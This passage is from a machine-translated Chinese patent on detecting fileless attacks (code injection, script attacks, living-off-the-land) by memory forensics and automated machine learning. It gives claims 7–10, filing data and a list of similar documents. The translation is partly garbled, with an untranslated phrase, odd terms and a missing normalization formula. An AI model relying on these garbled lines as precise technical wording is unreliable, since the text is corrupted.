and the verification analysis module is used for carrying out verification analysis on the tested malicious sample according to the test result.
7. The memory forensic-based file-less attack investigation system according to claim 6, wherein the memory image acquisition module specifically comprises:
the file-free attack types comprise code injection, script attack and ground-leaving attack;
the code injection features comprise functions, binaries, codes, encryption information, countermeasures, memories, trojan horses and attack frameworks;
the script attack features comprise malicious character strings, neutral character strings and scripts, which are respectively used for detecting malicious command prompt script, neutral command prompt Fu Jiaoben and other malicious scripts;
the ground attack feature comprises a ground attack, a remote desktop protocol and a darknet communication protocol;
the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
8. The memory forensic-based file-less attack investigation system according to claim 6, wherein the feature extraction module specifically comprises:
the feature set acquisition sub-module is used for acquiring a feature set of a memory area corresponding to the sample;
and the feature extraction sub-module is used for setting a plug-in based on the memory evidence obtaining frame and extracting the features of the feature set.
9. The memory forensic-based file-less attack investigation system according to claim 6, wherein the data processing module specifically comprises:
the deduplication operation submodule is used for converting the sample into a set element, deduplicating repeated items and converting back to the original data type;
the normalization operation formula is:
wherein x is Label (C) For the result processed by Min-Max normalized conversion function, x is the data of the sample, x max X is the maximum value of the sample data min Is the minimum of the sample data.
10. The memory forensic based file-less attack investigation system according to claim 6, wherein the automatic machine learning module specifically comprises:
a data set dividing submodule for dividing the data set into a training set and a testing set and randomly distributing the samples;
the model training sub-module is used for carrying out model training on the training set by using an automatic machine learning library, comparing evaluation indexes of different models according to output results, and selecting a model with highest precision on the training set as an optimal model;
the model test sub-module is used for applying an optimal model to the test set to test to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;
the model judging sub-module is used for judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and retraining and testing; if satisfied, the model is deployed to the actual application.
CN202311414040.6A 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining Pending CN117478373A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311414040.6A CN117478373A (en) 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202311414040.6A CN117478373A (en) 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining

Publications (1)

Publication Number Publication Date
CN117478373A true CN117478373A (en) 2024-01-30

Family

ID=89624901

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202311414040.6A Pending CN117478373A (en) 2023-10-30 2023-10-30 File-free attack investigation method and system based on memory evidence obtaining

Country Status (1)

Country Link
CN (1) CN117478373A (en)

Similar Documents

Publication Publication Date Title
Mosli et al. Automated malware detection using artifacts in forensic memory images
Carmony et al. Extract Me If You Can: Abusing PDF Parsers in Malware Detectors.
Komatwar et al. Retracted article: a survey on malware detection and classification
EP2955658B1 (en) System and methods for detecting harmful files of different formats
US20190132355A1 (en) Malicious script detection
US20110041179A1 (en) Malware detection
US11212297B2 (en) Access classification device, access classification method, and recording medium
Zhao et al. Malicious executables classification based on behavioral factor analysis
CN107688743B (en) Malicious program detection and analysis method and system
US9239922B1 (en) Document exploit detection using baseline comparison
CN107247902B (en) Malicious software classification system and method
Shan et al. Growing grapes in your computer to defend against malware
CN110221977A (en) Website penetration test method based on ai
Poudyal et al. Analysis of crypto-ransomware using ML-based multi-level profiling
Yücel et al. Imaging and evaluating the memory access for malware
CN114386032A (en) Firmware detection system and method for power Internet of things equipment
Xu et al. SoProtector: Safeguard privacy for native SO files in evolving mobile IoT applications
Eskandari et al. To incorporate sequential dynamic features in malware detection engines
Visu et al. Software-defined forensic framework for malware disaster management in Internet of Thing devices for extreme surveillance
Lo et al. Towards an effective and efficient malware detection system
Chew et al. ESCAPADE: Encryption-type-ransomware: System call based pattern detection
CN108229168B (en) Heuristic detection method, system and storage medium for nested files
Alshamrani Design and analysis of machine learning based technique for malware identification and classification of portable document format files
CN116932381A (en) Automatic evaluation method for security risk of applet and related equipment
CN111898126A (en) Android repackaging application detection method based on dynamically acquired user interface

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination